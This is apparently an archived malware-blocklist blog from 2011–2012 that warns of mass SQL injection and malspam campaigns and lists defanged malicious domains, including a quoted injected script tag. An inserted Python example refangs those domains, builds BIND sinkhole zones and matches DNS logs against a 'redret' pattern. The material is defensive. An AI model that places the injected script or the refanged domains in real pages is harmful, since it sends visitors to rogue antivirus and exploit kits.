sqli: Block Njukol -dot- com

Posted on April 29th, 2012 in 0day,iframes,New Domains,sql injection by dglosser

We received a report that there's an SQL injection campaign going on involving njukol . com/r.php. Please check your web sites and add this domain to your block or shun list. Original Source: http://ilion.blog47.fc2.com/

Urgent Block: nikjju.com and best-antiviruu.de.lv

Posted on April 17th, 2012 in 0day,iframes,rogue antivirus,sql injection by dglosser

Sucuri is reporting a new Mass SQL Injection campaign. Sites are infected with the following JavaScript (domain defanged with spaces):

<script src="http://nikjju . com/r.php"></script>

which redirects to Fake/Rogue AV sites such as best-antiviruu. de. lv

Please add these sites to your blocklists and sinkholes ASAP.

Urgent Block: ionis90landsi -dot- rr -dot- nu — Mass Injection of WordPress Websites

Posted on March 6th, 2012 in 0day,sql injection by dglosser

Websense has posted an article relating to a mass SQL injection into WordPress sites. The domain is ionis90landsi . rr . nu (spaces added).

This link seems to have a larger list  of domains to block…

Urgent Block: BlackHole Exploit Kit redret Spam Domains

Posted on December 6th, 2011 in 0day,Domain News,malspam by dglosser

From the Internet Storm Center, please block the following domains:

  • czredret . ru
  • curedret . ru
  • ctredret . ru
  • crredret . ru
  • bzredret . ru
  • byredret . ru
  • bxredret . ru
  • bwredret . ru
  • bvredret . ru
  • bsredret . ru
  • bpredret . ru
  • boredret . ru
  • blredret . ru
  • bkredret . ru
  • biredret . ru
  • bhredret . ru
  • bgredret . ru
  • bfredret . ru
  • beredret . ru
  • bdredret . ru
  • bcredret . ru
  • bbredret . ru
  • aredret . ru
  • apredret . ru
  • amredret . ru
  • alredret . ru
  • akredret . ru
  • ajredret . ru
  • airedret . ru
  • ahredret . ru
  • agredret . ru
  • afredret . ru
  • aeredret . ru
  • adredret . ru
  • acredret . ru
  • abredret . ru
  • aaredret . ru

and be on the lookout for more domains containing the string "redret" (hmmm, I wonder if AdBlock or MyWOT can handle regex..).

IP addresses to block are also in the article. Also see this article. They will be added here, but you shouldn't wait.

iframe,sqli,cybercriminal domains

Posted on December 3rd, 2011 in 0day,iframes,New Domains,Spyeye,Trojans,zeus by dglosser

A small but important update containing domains associated with iframes, cybercriminals, zeus, and our friend lilupophilupop . com.   Sources include malc0de.com, safebrowsing.google.com, www.spamhaus.org (Every source is  listed in the domains.txt file)…

Reminder: the mirror for compressed zip files is up and running – please contact us for details – right now it has very little usage.

Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.

The malware block lists provided here are free for noncommercial use as part of the fight against malware. Any commercial use of this list is strictly prohibited without prior approval.

Please use the “datestamp” and “timestamp” file to determine if the list has been updated and ONLY pull the files you need – abusers will be banned!

Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.

The domains.txt file is the complete list along with the original reference for each entry.
The justdomains file contains only the domain names.

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format.

Also Available in AdBlock, ISA, and MaraDNS formats.

A trusted source on WOT (the Web of Trust). Used by SURBL, MOREnet, SANS, and others…
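The two practical points above, watching for anything containing "redret" as a pattern rather than a fixed list, and publishing the list in a DNS-server format such as BIND zones, can be tied together in a few lines. The following is an added example, not the site's own tooling: it normalises the defanged notations used in these posts ("a . b", "a -dot- b", "a [dot] b") back into real domain names, emits one BIND zone stanza per domain (the stanza shape and the sinkhole file path are assumptions, not necessarily what the spywaredomains.zones file looks like), and checks constructed BIND-style query log lines against the list, including parent-domain matches and the "redret" substring watch.

```python
"""Normalise defanged domains from blocklist posts, emit BIND zone stanzas,
and check DNS query log lines against the list.
Added example: the domains are the ones named in the posts above; the log
lines, the zone stanza shape and the file path are constructed assumptions."""
import re
from typing import Iterable, List, Set

# Defanged notations exactly as the posts above write them
DEFANGED_DOMAINS = [
    "njukol . com",
    "nikjju . com",
    "best-antiviruu. de. lv",
    "ionis90landsi -dot- rr -dot- nu",
    "lilupophilupop .com",
    "willysy .com",
    "xwhoisdns [dot] com",
]

# The "redret" post asks for anything containing that string; treat it as a
# pattern rather than enumerating every two-letter prefix.
WATCH_PATTERNS = [re.compile(r"redret")]

# Separators seen in defanged names: " . ", "-dot-", "[dot]", "(dot)"
_SEPARATOR = re.compile(r"\s*(?:\[dot\]|\(dot\)|-dot-|\.)\s*", re.IGNORECASE)
# One DNS label: letters, digits, hyphens; no leading/trailing hyphen; max 63 chars
_LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def refang(defanged: str) -> str:
    """'a [dot] b', 'a -dot- b', 'a . b' -> 'a.b' (lower-cased, whitespace removed).
    Raises ValueError if the result is not a plausible domain name."""
    labels = [p.strip().lower() for p in _SEPARATOR.split(defanged.strip())]
    labels = [p for p in labels if p]
    if len(labels) < 2 or not all(_LABEL.match(p) for p in labels):
        raise ValueError(f"not a usable domain: {defanged!r}")
    return ".".join(labels)


def to_bind_zones(domains: Iterable[str],
                  hosts_file: str = "/etc/namedb/blockeddomain.hosts") -> str:
    """One BIND 'zone' stanza per blocked domain, all pointing at a sinkhole
    zone file. Stanza shape and default path are assumptions for this example."""
    return "\n".join(
        f'zone "{d}" {{type master; file "{hosts_file}";}};' for d in sorted(domains)
    )


def is_blocked(name: str, blocked: Set[str], patterns=WATCH_PATTERNS) -> bool:
    """True if name or any parent domain is on the list, or name matches a
    watch pattern. A blocked domain appearing as a *prefix* of a longer name
    (e.g. blocked.com.evil.example) is deliberately not a match."""
    name = name.lower().rstrip(".")
    labels = name.split(".")
    for i in range(len(labels) - 1):      # name itself, then each parent domain
        if ".".join(labels[i:]) in blocked:
            return True
    return any(p.search(name) for p in patterns)


# Queried name in a BIND-style query log line: "... query: <name> IN <type> ..."
_QUERY = re.compile(r"query: (\S+) IN")


def hits(log_lines: Iterable[str], blocked: Set[str]) -> List[str]:
    """Queried names from query-log lines that hit the blocklist or a pattern."""
    found = []
    for line in log_lines:
        m = _QUERY.search(line)
        if m and is_blocked(m.group(1), blocked):
            found.append(m.group(1).lower().rstrip("."))
    return found


BLOCKED = {refang(d) for d in DEFANGED_DOMAINS}

# Constructed sample log lines in BIND querylog style; not real traffic
SAMPLE_LOG = [
    "client 10.0.0.5#53211: query: www.nikjju.com IN A +",
    "client 10.0.0.7#40022: query: example.org IN A +",
    "client 10.0.0.9#51000: query: bqredret.ru IN A +",
    "client 10.0.0.9#51001: query: lilupophilupop.com.evil.example IN A +",
]

if __name__ == "__main__":
    print(to_bind_zones(BLOCKED))
    print(hits(SAMPLE_LOG, BLOCKED))   # ['www.nikjju.com', 'bqredret.ru']
```

Run as-is it prints the zone stanzas and the two log hits: the subdomain of a listed domain and the unlisted "redret" name. The last sample line shows why the matcher walks parent domains rather than doing a substring test against the list: a listed domain buried inside a longer, unrelated name is not a hit, which keeps a list-based block from producing false positives.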

Urgent Block: lilupophilupop-dot-com (SQL Injection)

Posted on December 2nd, 2011 in 0day,sql injection by dglosser

SANS is reporting that there's an SQLi campaign going on right now, with the malicious domain lilupophilupop .com being injected into sites running MSSQL.

We will block that domain on the next update, but you shouldn't wait…

Source: http://isc.sans.edu/diary.html?storyid=12127#comment

Steve Jobs Malspam

Posted on October 12th, 2011 in 0day by dglosser

Guess it was inevitable… Steve Jobs spam leading to malicious exploits. As the list of exploit domains is still evolving, see the following for more information:



willysy .com Mass Injection

Posted on July 26th, 2011 in 0day,Domain News,exploit by dglosser

Armorize reports on a mass injection affecting 90,000 infected pages. The injected iframe points to willysy .com.

We’ll be adding those domains on tonight’s update, but please read the article and take immediate action if you can.

Flash Exploits on the Loose

Posted on June 17th, 2011 in 0day,Domain News by dglosser

Shadowserver has a great write-up called Flash Exploits on the Loose: Update Now: It is Critical You Update Your Adobe Flash Player. Several domains serving malicious payloads are listed.

We'll be adding these domains on the next update, but you should add the domains and IP addresses to your domain and IP blocklists ASAP.

Urgent Block: xwhoisdns [dot] com

Posted on May 20th, 2011 in 0day,New Domains by dglosser

xwhoisdns . com will be added to tonight's blocklist, but you may wish to add it to your blocklist ASAP.

ThreatExpert has more details on this guy.